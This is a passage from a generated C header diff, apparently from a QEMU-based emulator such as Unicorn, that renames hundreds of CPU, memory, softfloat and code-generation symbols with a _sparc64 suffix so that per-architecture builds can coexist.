+#define address_space_lookup_region address_space_lookup_region_sparc64 +#define address_space_map address_space_map_sparc64 +#define address_space_read address_space_read_sparc64 +#define address_space_rw address_space_rw_sparc64 +#define address_space_translate address_space_translate_sparc64 +#define address_space_translate_for_iotlb address_space_translate_for_iotlb_sparc64 +#define address_space_translate_internal address_space_translate_internal_sparc64 +#define address_space_unmap address_space_unmap_sparc64 +#define address_space_update_topology address_space_update_topology_sparc64 +#define address_space_update_topology_pass address_space_update_topology_pass_sparc64 +#define address_space_write address_space_write_sparc64 +#define addrrange_contains addrrange_contains_sparc64 +#define addrrange_end addrrange_end_sparc64 +#define addrrange_equal addrrange_equal_sparc64 +#define addrrange_intersection addrrange_intersection_sparc64 +#define addrrange_intersects addrrange_intersects_sparc64 +#define addrrange_make addrrange_make_sparc64 +#define adjust_endianness adjust_endianness_sparc64 +#define all_helpers all_helpers_sparc64 +#define alloc_code_gen_buffer alloc_code_gen_buffer_sparc64 +#define alloc_entry alloc_entry_sparc64 +#define always_true always_true_sparc64 +#define arm1026_initfn arm1026_initfn_sparc64 +#define arm1136_initfn arm1136_initfn_sparc64 +#define arm1136_r2_initfn arm1136_r2_initfn_sparc64 +#define arm1176_initfn arm1176_initfn_sparc64 +#define arm11mpcore_initfn arm11mpcore_initfn_sparc64 +#define arm926_initfn arm926_initfn_sparc64 +#define arm946_initfn arm946_initfn_sparc64 +#define arm_ccnt_enabled arm_ccnt_enabled_sparc64 +#define arm_cp_read_zero arm_cp_read_zero_sparc64 +#define arm_cp_reset_ignore arm_cp_reset_ignore_sparc64 +#define arm_cpu_do_interrupt arm_cpu_do_interrupt_sparc64 +#define arm_cpu_exec_interrupt arm_cpu_exec_interrupt_sparc64 +#define arm_cpu_finalizefn arm_cpu_finalizefn_sparc64 +#define arm_cpu_get_phys_page_debug arm_cpu_get_phys_page_debug_sparc64 +#define arm_cpu_handle_mmu_fault arm_cpu_handle_mmu_fault_sparc64 +#define arm_cpu_initfn arm_cpu_initfn_sparc64 +#define arm_cpu_list arm_cpu_list_sparc64 +#define cpu_loop_exit cpu_loop_exit_sparc64 +#define arm_cpu_post_init arm_cpu_post_init_sparc64 +#define arm_cpu_realizefn arm_cpu_realizefn_sparc64 +#define arm_cpu_register_gdb_regs_for_features arm_cpu_register_gdb_regs_for_features_sparc64 +#define arm_cpu_register_types arm_cpu_register_types_sparc64 +#define cpu_resume_from_signal cpu_resume_from_signal_sparc64 +#define arm_cpus arm_cpus_sparc64 +#define arm_cpu_set_pc arm_cpu_set_pc_sparc64 +#define arm_cp_write_ignore arm_cp_write_ignore_sparc64 +#define arm_current_el arm_current_el_sparc64 +#define arm_dc_feature arm_dc_feature_sparc64 +#define arm_debug_excp_handler arm_debug_excp_handler_sparc64 +#define arm_debug_target_el arm_debug_target_el_sparc64 +#define arm_el_is_aa64 arm_el_is_aa64_sparc64 +#define arm_env_get_cpu arm_env_get_cpu_sparc64 +#define arm_excp_target_el arm_excp_target_el_sparc64 +#define arm_excp_unmasked arm_excp_unmasked_sparc64 +#define arm_feature arm_feature_sparc64 +#define arm_generate_debug_exceptions arm_generate_debug_exceptions_sparc64 +#define gen_intermediate_code gen_intermediate_code_sparc64 +#define gen_intermediate_code_pc gen_intermediate_code_pc_sparc64 +#define arm_gen_test_cc arm_gen_test_cc_sparc64 +#define arm_gt_ptimer_cb arm_gt_ptimer_cb_sparc64 +#define arm_gt_vtimer_cb arm_gt_vtimer_cb_sparc64 +#define arm_handle_psci_call arm_handle_psci_call_sparc64 +#define arm_is_psci_call arm_is_psci_call_sparc64 +#define arm_is_secure arm_is_secure_sparc64 +#define arm_is_secure_below_el3 arm_is_secure_below_el3_sparc64 +#define arm_ldl_code arm_ldl_code_sparc64 +#define arm_lduw_code arm_lduw_code_sparc64 +#define arm_log_exception arm_log_exception_sparc64 +#define arm_reg_read arm_reg_read_sparc64 +#define arm_reg_reset arm_reg_reset_sparc64 +#define arm_reg_write arm_reg_write_sparc64 +#define restore_state_to_opc restore_state_to_opc_sparc64 +#define arm_rmode_to_sf arm_rmode_to_sf_sparc64 +#define arm_singlestep_active arm_singlestep_active_sparc64 +#define tlb_fill tlb_fill_sparc64 +#define tlb_flush tlb_flush_sparc64 +#define tlb_flush_page tlb_flush_page_sparc64 +#define tlb_set_page tlb_set_page_sparc64 +#define arm_translate_init arm_translate_init_sparc64 +#define arm_v7m_class_init arm_v7m_class_init_sparc64 +#define arm_v7m_cpu_do_interrupt arm_v7m_cpu_do_interrupt_sparc64 +#define ats_access ats_access_sparc64 +#define ats_write ats_write_sparc64 +#define bad_mode_switch bad_mode_switch_sparc64 +#define bank_number bank_number_sparc64 +#define bitmap_zero_extend bitmap_zero_extend_sparc64 +#define bp_wp_matches bp_wp_matches_sparc64 +#define breakpoint_invalidate breakpoint_invalidate_sparc64 +#define build_page_bitmap build_page_bitmap_sparc64 +#define bus_add_child bus_add_child_sparc64 +#define bus_class_init bus_class_init_sparc64 +#define bus_info bus_info_sparc64 +#define bus_unparent bus_unparent_sparc64 +#define cache_block_ops_cp_reginfo cache_block_ops_cp_reginfo_sparc64 +#define cache_dirty_status_cp_reginfo cache_dirty_status_cp_reginfo_sparc64 +#define cache_test_clean_cp_reginfo cache_test_clean_cp_reginfo_sparc64 +#define call_recip_estimate call_recip_estimate_sparc64 +#define can_merge can_merge_sparc64 +#define capacity_increase capacity_increase_sparc64 +#define ccsidr_read ccsidr_read_sparc64 +#define check_ap check_ap_sparc64 +#define check_breakpoints check_breakpoints_sparc64 +#define check_watchpoints check_watchpoints_sparc64 +#define cho cho_sparc64 +#define clear_bit clear_bit_sparc64 +#define clz32 clz32_sparc64 +#define clz64 clz64_sparc64 +#define cmp_flatrange_addr cmp_flatrange_addr_sparc64 +#define code_gen_alloc code_gen_alloc_sparc64 +#define commonNaNToFloat128 commonNaNToFloat128_sparc64 +#define commonNaNToFloat16 commonNaNToFloat16_sparc64 +#define commonNaNToFloat32 commonNaNToFloat32_sparc64 +#define commonNaNToFloat64 commonNaNToFloat64_sparc64 +#define commonNaNToFloatx80 commonNaNToFloatx80_sparc64 +#define compute_abs_deadline compute_abs_deadline_sparc64 +#define cond_name cond_name_sparc64 +#define configure_accelerator configure_accelerator_sparc64 +#define container_get container_get_sparc64 +#define container_info container_info_sparc64 +#define container_register_types container_register_types_sparc64 +#define contextidr_write contextidr_write_sparc64 +#define core_log_global_start core_log_global_start_sparc64 +#define core_log_global_stop core_log_global_stop_sparc64 +#define core_memory_listener core_memory_listener_sparc64 +#define cortexa15_cp_reginfo cortexa15_cp_reginfo_sparc64 +#define cortex_a15_initfn cortex_a15_initfn_sparc64 +#define cortexa8_cp_reginfo cortexa8_cp_reginfo_sparc64 +#define cortex_a8_initfn cortex_a8_initfn_sparc64 +#define cortexa9_cp_reginfo cortexa9_cp_reginfo_sparc64 +#define cortex_a9_initfn cortex_a9_initfn_sparc64 +#define cortex_m3_initfn cortex_m3_initfn_sparc64 +#define count_cpreg count_cpreg_sparc64 +#define countLeadingZeros32 countLeadingZeros32_sparc64 +#define countLeadingZeros64 countLeadingZeros64_sparc64 +#define cp_access_ok cp_access_ok_sparc64 +#define cpacr_write cpacr_write_sparc64 +#define cpreg_field_is_64bit cpreg_field_is_64bit_sparc64 +#define cp_reginfo cp_reginfo_sparc64 +#define cpreg_key_compare cpreg_key_compare_sparc64 +#define cpreg_make_keylist cpreg_make_keylist_sparc64 +#define cp_reg_reset cp_reg_reset_sparc64 +#define cpreg_to_kvm_id cpreg_to_kvm_id_sparc64 +#define cpsr_read cpsr_read_sparc64 +#define cpsr_write cpsr_write_sparc64 +#define cptype_valid cptype_valid_sparc64 +#define cpu_abort cpu_abort_sparc64 +#define cpu_arm_exec cpu_arm_exec_sparc64 +#define cpu_arm_gen_code cpu_arm_gen_code_sparc64 +#define cpu_arm_init cpu_arm_init_sparc64 +#define cpu_breakpoint_insert cpu_breakpoint_insert_sparc64 +#define cpu_breakpoint_remove cpu_breakpoint_remove_sparc64 +#define cpu_breakpoint_remove_all cpu_breakpoint_remove_all_sparc64 +#define cpu_breakpoint_remove_by_ref cpu_breakpoint_remove_by_ref_sparc64 +#define cpu_can_do_io cpu_can_do_io_sparc64 +#define cpu_can_run cpu_can_run_sparc64 +#define cpu_class_init cpu_class_init_sparc64 +#define cpu_common_class_by_name cpu_common_class_by_name_sparc64 +#define cpu_common_exec_interrupt cpu_common_exec_interrupt_sparc64 +#define cpu_common_get_arch_id cpu_common_get_arch_id_sparc64 +#define cpu_common_get_memory_mapping cpu_common_get_memory_mapping_sparc64 +#define cpu_common_get_paging_enabled cpu_common_get_paging_enabled_sparc64 +#define cpu_common_has_work cpu_common_has_work_sparc64 +#define cpu_common_initfn cpu_common_initfn_sparc64 +#define cpu_common_noop cpu_common_noop_sparc64 +#define cpu_common_parse_features cpu_common_parse_features_sparc64 +#define cpu_common_realizefn cpu_common_realizefn_sparc64 +#define cpu_common_reset cpu_common_reset_sparc64 +#define cpu_dump_statistics cpu_dump_statistics_sparc64 +#define cpu_exec_init cpu_exec_init_sparc64 +#define cpu_flush_icache_range cpu_flush_icache_range_sparc64 +#define cpu_gen_init cpu_gen_init_sparc64 +#define cpu_get_clock cpu_get_clock_sparc64 +#define cpu_get_real_ticks cpu_get_real_ticks_sparc64 +#define cpu_get_tb_cpu_state cpu_get_tb_cpu_state_sparc64 +#define cpu_handle_debug_exception cpu_handle_debug_exception_sparc64 +#define cpu_handle_guest_debug cpu_handle_guest_debug_sparc64 +#define cpu_inb cpu_inb_sparc64 +#define cpu_inl cpu_inl_sparc64 +#define cpu_interrupt cpu_interrupt_sparc64 +#define cpu_interrupt_handler cpu_interrupt_handler_sparc64 +#define cpu_inw cpu_inw_sparc64 +#define cpu_io_recompile cpu_io_recompile_sparc64 +#define cpu_is_stopped cpu_is_stopped_sparc64 +#define cpu_ldl_code cpu_ldl_code_sparc64 +#define cpu_ldub_code cpu_ldub_code_sparc64 +#define cpu_lduw_code cpu_lduw_code_sparc64 +#define cpu_memory_rw_debug cpu_memory_rw_debug_sparc64 +#define cpu_mmu_index cpu_mmu_index_sparc64 +#define cpu_outb cpu_outb_sparc64 +#define cpu_outl cpu_outl_sparc64 +#define cpu_outw cpu_outw_sparc64 +#define cpu_physical_memory_clear_dirty_range cpu_physical_memory_clear_dirty_range_sparc64 +#define cpu_physical_memory_get_clean cpu_physical_memory_get_clean_sparc64 +#define cpu_physical_memory_get_dirty cpu_physical_memory_get_dirty_sparc64 +#define cpu_physical_memory_get_dirty_flag cpu_physical_memory_get_dirty_flag_sparc64 +#define cpu_physical_memory_is_clean cpu_physical_memory_is_clean_sparc64 +#define cpu_physical_memory_is_io cpu_physical_memory_is_io_sparc64 +#define cpu_physical_memory_map cpu_physical_memory_map_sparc64 +#define cpu_physical_memory_range_includes_clean cpu_physical_memory_range_includes_clean_sparc64 +#define cpu_physical_memory_reset_dirty cpu_physical_memory_reset_dirty_sparc64 +#define cpu_physical_memory_rw cpu_physical_memory_rw_sparc64 +#define cpu_physical_memory_set_dirty_flag cpu_physical_memory_set_dirty_flag_sparc64 +#define cpu_physical_memory_set_dirty_range cpu_physical_memory_set_dirty_range_sparc64 +#define cpu_physical_memory_unmap cpu_physical_memory_unmap_sparc64 +#define cpu_physical_memory_write_rom cpu_physical_memory_write_rom_sparc64 +#define cpu_physical_memory_write_rom_internal cpu_physical_memory_write_rom_internal_sparc64 +#define cpu_register cpu_register_sparc64 +#define cpu_register_types cpu_register_types_sparc64 +#define cpu_restore_state cpu_restore_state_sparc64 +#define cpu_restore_state_from_tb cpu_restore_state_from_tb_sparc64 +#define cpu_single_step cpu_single_step_sparc64 +#define cpu_tb_exec cpu_tb_exec_sparc64 +#define cpu_tlb_reset_dirty_all cpu_tlb_reset_dirty_all_sparc64 +#define cpu_to_be64 cpu_to_be64_sparc64 +#define cpu_to_le32 cpu_to_le32_sparc64 +#define cpu_to_le64 cpu_to_le64_sparc64 +#define cpu_type_info cpu_type_info_sparc64 +#define cpu_unassigned_access cpu_unassigned_access_sparc64 +#define cpu_watchpoint_address_matches cpu_watchpoint_address_matches_sparc64 +#define cpu_watchpoint_insert cpu_watchpoint_insert_sparc64 +#define cpu_watchpoint_remove cpu_watchpoint_remove_sparc64 +#define cpu_watchpoint_remove_all cpu_watchpoint_remove_all_sparc64 +#define cpu_watchpoint_remove_by_ref cpu_watchpoint_remove_by_ref_sparc64 +#define crc32c_table crc32c_table_sparc64 +#define create_new_memory_mapping create_new_memory_mapping_sparc64 +#define csselr_write csselr_write_sparc64 +#define cto32 cto32_sparc64 +#define ctr_el0_access ctr_el0_access_sparc64 +#define ctz32 ctz32_sparc64 +#define ctz64 ctz64_sparc64 +#define dacr_write dacr_write_sparc64 +#define dbgbcr_write dbgbcr_write_sparc64 +#define dbgbvr_write dbgbvr_write_sparc64 +#define dbgwcr_write dbgwcr_write_sparc64 +#define dbgwvr_write dbgwvr_write_sparc64 +#define debug_cp_reginfo debug_cp_reginfo_sparc64 +#define debug_frame debug_frame_sparc64 +#define debug_lpae_cp_reginfo debug_lpae_cp_reginfo_sparc64 +#define define_arm_cp_regs define_arm_cp_regs_sparc64 +#define define_arm_cp_regs_with_opaque define_arm_cp_regs_with_opaque_sparc64 +#define define_debug_regs define_debug_regs_sparc64 +#define define_one_arm_cp_reg define_one_arm_cp_reg_sparc64 +#define define_one_arm_cp_reg_with_opaque define_one_arm_cp_reg_with_opaque_sparc64 +#define deposit32 deposit32_sparc64 +#define deposit64 deposit64_sparc64 +#define deregister_tm_clones deregister_tm_clones_sparc64 +#define device_class_base_init device_class_base_init_sparc64 +#define device_class_init device_class_init_sparc64 +#define device_finalize device_finalize_sparc64 +#define device_get_realized device_get_realized_sparc64 +#define device_initfn device_initfn_sparc64 +#define device_post_init device_post_init_sparc64 +#define device_reset device_reset_sparc64 +#define device_set_realized device_set_realized_sparc64 +#define device_type_info device_type_info_sparc64 +#define disas_arm_insn disas_arm_insn_sparc64 +#define disas_coproc_insn disas_coproc_insn_sparc64 +#define disas_dsp_insn disas_dsp_insn_sparc64 +#define disas_iwmmxt_insn disas_iwmmxt_insn_sparc64 +#define disas_neon_data_insn disas_neon_data_insn_sparc64 +#define disas_neon_ls_insn disas_neon_ls_insn_sparc64 +#define disas_thumb2_insn disas_thumb2_insn_sparc64 +#define disas_thumb_insn disas_thumb_insn_sparc64 +#define disas_vfp_insn disas_vfp_insn_sparc64 +#define disas_vfp_v8_insn disas_vfp_v8_insn_sparc64 +#define do_arm_semihosting do_arm_semihosting_sparc64 +#define do_clz16 do_clz16_sparc64 +#define do_clz8 do_clz8_sparc64 +#define do_constant_folding do_constant_folding_sparc64 +#define do_constant_folding_2 do_constant_folding_2_sparc64 +#define do_constant_folding_cond do_constant_folding_cond_sparc64 +#define do_constant_folding_cond2 do_constant_folding_cond2_sparc64 +#define do_constant_folding_cond_32 do_constant_folding_cond_32_sparc64 +#define do_constant_folding_cond_64 do_constant_folding_cond_64_sparc64 +#define do_constant_folding_cond_eq do_constant_folding_cond_eq_sparc64 +#define do_fcvt_f16_to_f32 do_fcvt_f16_to_f32_sparc64 +#define do_fcvt_f32_to_f16 do_fcvt_f32_to_f16_sparc64 +#define do_ssat do_ssat_sparc64 +#define do_usad do_usad_sparc64 +#define do_usat do_usat_sparc64 +#define do_v7m_exception_exit do_v7m_exception_exit_sparc64 +#define dummy_c15_cp_reginfo dummy_c15_cp_reginfo_sparc64 +#define dummy_func dummy_func_sparc64 +#define dummy_section dummy_section_sparc64 +#define _DYNAMIC _DYNAMIC_sparc64 +#define _edata _edata_sparc64 +#define _end _end_sparc64 +#define end_list end_list_sparc64 +#define eq128 eq128_sparc64 +#define ErrorClass_lookup ErrorClass_lookup_sparc64 +#define error_copy error_copy_sparc64 +#define error_exit error_exit_sparc64 +#define error_get_class error_get_class_sparc64 +#define error_get_pretty error_get_pretty_sparc64 +#define error_setg_file_open error_setg_file_open_sparc64 +#define estimateDiv128To64 estimateDiv128To64_sparc64 +#define estimateSqrt32 estimateSqrt32_sparc64 +#define excnames excnames_sparc64 +#define excp_is_internal excp_is_internal_sparc64 +#define extended_addresses_enabled extended_addresses_enabled_sparc64 +#define extended_mpu_ap_bits extended_mpu_ap_bits_sparc64 +#define extract32 extract32_sparc64 +#define extract64 extract64_sparc64 +#define extractFloat128Exp extractFloat128Exp_sparc64 +#define extractFloat128Frac0 extractFloat128Frac0_sparc64 +#define extractFloat128Frac1 extractFloat128Frac1_sparc64 +#define extractFloat128Sign extractFloat128Sign_sparc64 +#define extractFloat16Exp extractFloat16Exp_sparc64 +#define extractFloat16Frac extractFloat16Frac_sparc64 +#define extractFloat16Sign extractFloat16Sign_sparc64 +#define extractFloat32Exp extractFloat32Exp_sparc64 +#define extractFloat32Frac extractFloat32Frac_sparc64 +#define extractFloat32Sign extractFloat32Sign_sparc64 +#define extractFloat64Exp extractFloat64Exp_sparc64 +#define extractFloat64Frac extractFloat64Frac_sparc64 +#define extractFloat64Sign extractFloat64Sign_sparc64 +#define extractFloatx80Exp extractFloatx80Exp_sparc64 +#define extractFloatx80Frac extractFloatx80Frac_sparc64 +#define extractFloatx80Sign extractFloatx80Sign_sparc64 +#define fcse_write fcse_write_sparc64 +#define find_better_copy find_better_copy_sparc64 +#define find_default_machine find_default_machine_sparc64 +#define find_desc_by_name find_desc_by_name_sparc64 +#define find_first_bit find_first_bit_sparc64 +#define find_paging_enabled_cpu find_paging_enabled_cpu_sparc64 +#define find_ram_block find_ram_block_sparc64 +#define find_ram_offset find_ram_offset_sparc64 +#define find_string find_string_sparc64 +#define find_type find_type_sparc64 +#define _fini _fini_sparc64 +#define flatrange_equal flatrange_equal_sparc64 +#define flatview_destroy flatview_destroy_sparc64 +#define flatview_init flatview_init_sparc64 +#define flatview_insert flatview_insert_sparc64 +#define flatview_lookup flatview_lookup_sparc64 +#define flatview_ref flatview_ref_sparc64 +#define flatview_simplify flatview_simplify_sparc64 +#define flatview_unref flatview_unref_sparc64 +#define float128_add float128_add_sparc64 +#define float128_compare float128_compare_sparc64 +#define float128_compare_internal float128_compare_internal_sparc64 +#define float128_compare_quiet float128_compare_quiet_sparc64 +#define float128_default_nan float128_default_nan_sparc64 +#define float128_div float128_div_sparc64 +#define float128_eq float128_eq_sparc64 +#define float128_eq_quiet float128_eq_quiet_sparc64 +#define float128_is_quiet_nan float128_is_quiet_nan_sparc64 +#define float128_is_signaling_nan float128_is_signaling_nan_sparc64 +#define float128_le float128_le_sparc64 +#define float128_le_quiet float128_le_quiet_sparc64 +#define float128_lt float128_lt_sparc64 +#define float128_lt_quiet float128_lt_quiet_sparc64 +#define float128_maybe_silence_nan float128_maybe_silence_nan_sparc64 +#define float128_mul float128_mul_sparc64 +#define float128_rem float128_rem_sparc64 +#define float128_round_to_int float128_round_to_int_sparc64 +#define float128_scalbn float128_scalbn_sparc64 +#define float128_sqrt float128_sqrt_sparc64 +#define float128_sub float128_sub_sparc64 +#define float128ToCommonNaN float128ToCommonNaN_sparc64 +#define float128_to_float32 float128_to_float32_sparc64 +#define float128_to_float64 float128_to_float64_sparc64 +#define float128_to_floatx80 float128_to_floatx80_sparc64 +#define float128_to_int32 float128_to_int32_sparc64 +#define float128_to_int32_round_to_zero float128_to_int32_round_to_zero_sparc64 +#define float128_to_int64 float128_to_int64_sparc64 +#define float128_to_int64_round_to_zero float128_to_int64_round_to_zero_sparc64 +#define float128_unordered float128_unordered_sparc64 +#define float128_unordered_quiet float128_unordered_quiet_sparc64 +#define float16_default_nan float16_default_nan_sparc64 +#define float16_is_quiet_nan float16_is_quiet_nan_sparc64 +#define float16_is_signaling_nan float16_is_signaling_nan_sparc64 +#define float16_maybe_silence_nan float16_maybe_silence_nan_sparc64 +#define float16ToCommonNaN float16ToCommonNaN_sparc64 +#define float16_to_float32 float16_to_float32_sparc64 +#define float16_to_float64 float16_to_float64_sparc64 +#define float32_abs float32_abs_sparc64 +#define float32_add float32_add_sparc64 +#define float32_chs float32_chs_sparc64 +#define float32_compare float32_compare_sparc64 +#define float32_compare_internal float32_compare_internal_sparc64 +#define float32_compare_quiet float32_compare_quiet_sparc64 +#define float32_default_nan float32_default_nan_sparc64 +#define float32_div float32_div_sparc64 +#define float32_eq float32_eq_sparc64 +#define float32_eq_quiet float32_eq_quiet_sparc64 +#define float32_exp2 float32_exp2_sparc64 +#define float32_exp2_coefficients float32_exp2_coefficients_sparc64 +#define float32_is_any_nan float32_is_any_nan_sparc64 +#define float32_is_infinity float32_is_infinity_sparc64 +#define float32_is_neg float32_is_neg_sparc64 +#define float32_is_quiet_nan float32_is_quiet_nan_sparc64 +#define float32_is_signaling_nan float32_is_signaling_nan_sparc64 +#define float32_is_zero float32_is_zero_sparc64 +#define float32_is_zero_or_denormal float32_is_zero_or_denormal_sparc64 +#define float32_le float32_le_sparc64 +#define float32_le_quiet float32_le_quiet_sparc64 +#define float32_log2 float32_log2_sparc64 +#define float32_lt float32_lt_sparc64 +#define float32_lt_quiet float32_lt_quiet_sparc64 +#define float32_max float32_max_sparc64 +#define float32_maxnum float32_maxnum_sparc64 +#define float32_maxnummag float32_maxnummag_sparc64 +#define float32_maybe_silence_nan float32_maybe_silence_nan_sparc64 +#define float32_min float32_min_sparc64 +#define float32_minmax float32_minmax_sparc64 +#define float32_minnum float32_minnum_sparc64 +#define float32_minnummag float32_minnummag_sparc64 +#define float32_mul float32_mul_sparc64 +#define float32_muladd float32_muladd_sparc64 +#define float32_rem float32_rem_sparc64 +#define float32_round_to_int float32_round_to_int_sparc64 +#define float32_scalbn float32_scalbn_sparc64 +#define float32_set_sign float32_set_sign_sparc64 +#define float32_sqrt float32_sqrt_sparc64 +#define float32_squash_input_denormal float32_squash_input_denormal_sparc64 +#define float32_sub float32_sub_sparc64 +#define float32ToCommonNaN float32ToCommonNaN_sparc64 +#define float32_to_float128 float32_to_float128_sparc64 +#define float32_to_float16 float32_to_float16_sparc64 +#define float32_to_float64 float32_to_float64_sparc64 +#define float32_to_floatx80 float32_to_floatx80_sparc64 +#define float32_to_int16 float32_to_int16_sparc64 +#define float32_to_int16_round_to_zero float32_to_int16_round_to_zero_sparc64 +#define float32_to_int32 float32_to_int32_sparc64 +#define float32_to_int32_round_to_zero float32_to_int32_round_to_zero_sparc64 +#define float32_to_int64 float32_to_int64_sparc64 +#define float32_to_int64_round_to_zero float32_to_int64_round_to_zero_sparc64 +#define float32_to_uint16 float32_to_uint16_sparc64 +#define float32_to_uint16_round_to_zero float32_to_uint16_round_to_zero_sparc64 +#define float32_to_uint32 float32_to_uint32_sparc64 +#define float32_to_uint32_round_to_zero float32_to_uint32_round_to_zero_sparc64 +#define float32_to_uint64 float32_to_uint64_sparc64 +#define float32_to_uint64_round_to_zero float32_to_uint64_round_to_zero_sparc64 +#define float32_unordered float32_unordered_sparc64 +#define float32_unordered_quiet float32_unordered_quiet_sparc64 +#define float64_abs float64_abs_sparc64 +#define float64_add float64_add_sparc64 +#define float64_chs float64_chs_sparc64 +#define float64_compare float64_compare_sparc64 +#define float64_compare_internal float64_compare_internal_sparc64 +#define float64_compare_quiet float64_compare_quiet_sparc64 +#define float64_default_nan float64_default_nan_sparc64 +#define float64_div float64_div_sparc64 +#define float64_eq float64_eq_sparc64 +#define float64_eq_quiet float64_eq_quiet_sparc64 +#define float64_is_any_nan float64_is_any_nan_sparc64 +#define float64_is_infinity float64_is_infinity_sparc64 +#define float64_is_neg float64_is_neg_sparc64 +#define float64_is_quiet_nan float64_is_quiet_nan_sparc64 +#define float64_is_signaling_nan float64_is_signaling_nan_sparc64 +#define float64_is_zero float64_is_zero_sparc64 +#define float64_le float64_le_sparc64 +#define float64_le_quiet float64_le_quiet_sparc64 +#define float64_log2 float64_log2_sparc64 +#define float64_lt float64_lt_sparc64 +#define float64_lt_quiet float64_lt_quiet_sparc64 +#define float64_max float64_max_sparc64 +#define float64_maxnum float64_maxnum_sparc64 +#define float64_maxnummag float64_maxnummag_sparc64 +#define float64_maybe_silence_nan float64_maybe_silence_nan_sparc64 +#define float64_min float64_min_sparc64 +#define float64_minmax float64_minmax_sparc64 +#define float64_minnum float64_minnum_sparc64 +#define float64_minnummag float64_minnummag_sparc64 +#define float64_mul float64_mul_sparc64 +#define float64_muladd float64_muladd_sparc64 +#define float64_rem float64_rem_sparc64 +#define float64_round_to_int float64_round_to_int_sparc64 +#define float64_scalbn float64_scalbn_sparc64 +#define float64_set_sign float64_set_sign_sparc64 +#define float64_sqrt float64_sqrt_sparc64 +#define float64_squash_input_denormal float64_squash_input_denormal_sparc64 +#define float64_sub float64_sub_sparc64 +#define float64ToCommonNaN float64ToCommonNaN_sparc64 +#define float64_to_float128 float64_to_float128_sparc64 +#define float64_to_float16 float64_to_float16_sparc64 +#define float64_to_float32 float64_to_float32_sparc64 +#define float64_to_floatx80 float64_to_floatx80_sparc64 +#define float64_to_int16 float64_to_int16_sparc64 +#define float64_to_int16_round_to_zero float64_to_int16_round_to_zero_sparc64 +#define float64_to_int32 float64_to_int32_sparc64 +#define float64_to_int32_round_to_zero float64_to_int32_round_to_zero_sparc64 +#define float64_to_int64 float64_to_int64_sparc64 +#define float64_to_int64_round_to_zero float64_to_int64_round_to_zero_sparc64 +#define float64_to_uint16 float64_to_uint16_sparc64 +#define float64_to_uint16_round_to_zero float64_to_uint16_round_to_zero_sparc64 +#define float64_to_uint32 float64_to_uint32_sparc64 +#define float64_to_uint32_round_to_zero float64_to_uint32_round_to_zero_sparc64 +#define float64_to_uint64 float64_to_uint64_sparc64 +#define float64_to_uint64_round_to_zero float64_to_uint64_round_to_zero_sparc64 +#define float64_trunc_to_int float64_trunc_to_int_sparc64 +#define float64_unordered float64_unordered_sparc64 +#define float64_unordered_quiet float64_unordered_quiet_sparc64 +#define float_raise float_raise_sparc64 +#define floatx80_add floatx80_add_sparc64 +#define floatx80_compare floatx80_compare_sparc64 +#define floatx80_compare_internal floatx80_compare_internal_sparc64 +#define floatx80_compare_quiet floatx80_compare_quiet_sparc64 +#define floatx80_default_nan floatx80_default_nan_sparc64 +#define floatx80_div floatx80_div_sparc64 +#define floatx80_eq floatx80_eq_sparc64 +#define floatx80_eq_quiet floatx80_eq_quiet_sparc64 +#define floatx80_is_quiet_nan floatx80_is_quiet_nan_sparc64 +#define floatx80_is_signaling_nan floatx80_is_signaling_nan_sparc64 +#define floatx80_le floatx80_le_sparc64 +#define floatx80_le_quiet floatx80_le_quiet_sparc64 +#define floatx80_lt floatx80_lt_sparc64 +#define floatx80_lt_quiet floatx80_lt_quiet_sparc64 +#define floatx80_maybe_silence_nan floatx80_maybe_silence_nan_sparc64 +#define floatx80_mul floatx80_mul_sparc64 +#define floatx80_rem floatx80_rem_sparc64 +#define floatx80_round_to_int floatx80_round_to_int_sparc64 +#define floatx80_scalbn floatx80_scalbn_sparc64 +#define floatx80_sqrt floatx80_sqrt_sparc64 +#define floatx80_sub floatx80_sub_sparc64 +#define floatx80ToCommonNaN floatx80ToCommonNaN_sparc64 +#define floatx80_to_float128 floatx80_to_float128_sparc64 +#define floatx80_to_float32 floatx80_to_float32_sparc64 +#define floatx80_to_float64 floatx80_to_float64_sparc64 +#define floatx80_to_int32 floatx80_to_int32_sparc64 +#define floatx80_to_int32_round_to_zero floatx80_to_int32_round_to_zero_sparc64 +#define floatx80_to_int64 floatx80_to_int64_sparc64 +#define floatx80_to_int64_round_to_zero floatx80_to_int64_round_to_zero_sparc64 +#define floatx80_unordered floatx80_unordered_sparc64 +#define floatx80_unordered_quiet floatx80_unordered_quiet_sparc64 +#define flush_icache_range flush_icache_range_sparc64 +#define format_string format_string_sparc64 +#define fp_decode_rm fp_decode_rm_sparc64 +#define frame_dummy frame_dummy_sparc64 +#define free_range free_range_sparc64 +#define fstat64 fstat64_sparc64 +#define futex_wait futex_wait_sparc64 +#define futex_wake futex_wake_sparc64 +#define gen_aa32_ld16s gen_aa32_ld16s_sparc64 +#define gen_aa32_ld16u gen_aa32_ld16u_sparc64 +#define gen_aa32_ld32u gen_aa32_ld32u_sparc64 +#define gen_aa32_ld64 gen_aa32_ld64_sparc64 +#define gen_aa32_ld8s gen_aa32_ld8s_sparc64 +#define gen_aa32_ld8u gen_aa32_ld8u_sparc64 +#define gen_aa32_st16 gen_aa32_st16_sparc64 +#define gen_aa32_st32 gen_aa32_st32_sparc64 +#define gen_aa32_st64 gen_aa32_st64_sparc64 +#define gen_aa32_st8 gen_aa32_st8_sparc64 +#define gen_adc gen_adc_sparc64 +#define gen_adc_CC gen_adc_CC_sparc64 +#define gen_add16 gen_add16_sparc64 +#define gen_add_carry gen_add_carry_sparc64 +#define gen_add_CC gen_add_CC_sparc64 +#define gen_add_datah_offset gen_add_datah_offset_sparc64 +#define gen_add_data_offset gen_add_data_offset_sparc64 +#define gen_addq gen_addq_sparc64 +#define gen_addq_lo gen_addq_lo_sparc64 +#define gen_addq_msw gen_addq_msw_sparc64 +#define gen_arm_parallel_addsub gen_arm_parallel_addsub_sparc64 +#define gen_arm_shift_im gen_arm_shift_im_sparc64 +#define gen_arm_shift_reg gen_arm_shift_reg_sparc64 +#define gen_bx gen_bx_sparc64 +#define gen_bx_im gen_bx_im_sparc64 +#define gen_clrex gen_clrex_sparc64 +#define generate_memory_topology generate_memory_topology_sparc64 +#define generic_timer_cp_reginfo generic_timer_cp_reginfo_sparc64 +#define gen_exception gen_exception_sparc64 +#define gen_exception_insn gen_exception_insn_sparc64 +#define gen_exception_internal gen_exception_internal_sparc64 +#define gen_exception_internal_insn gen_exception_internal_insn_sparc64 +#define gen_exception_return gen_exception_return_sparc64 +#define gen_goto_tb gen_goto_tb_sparc64 +#define gen_helper_access_check_cp_reg gen_helper_access_check_cp_reg_sparc64 +#define gen_helper_add_saturate 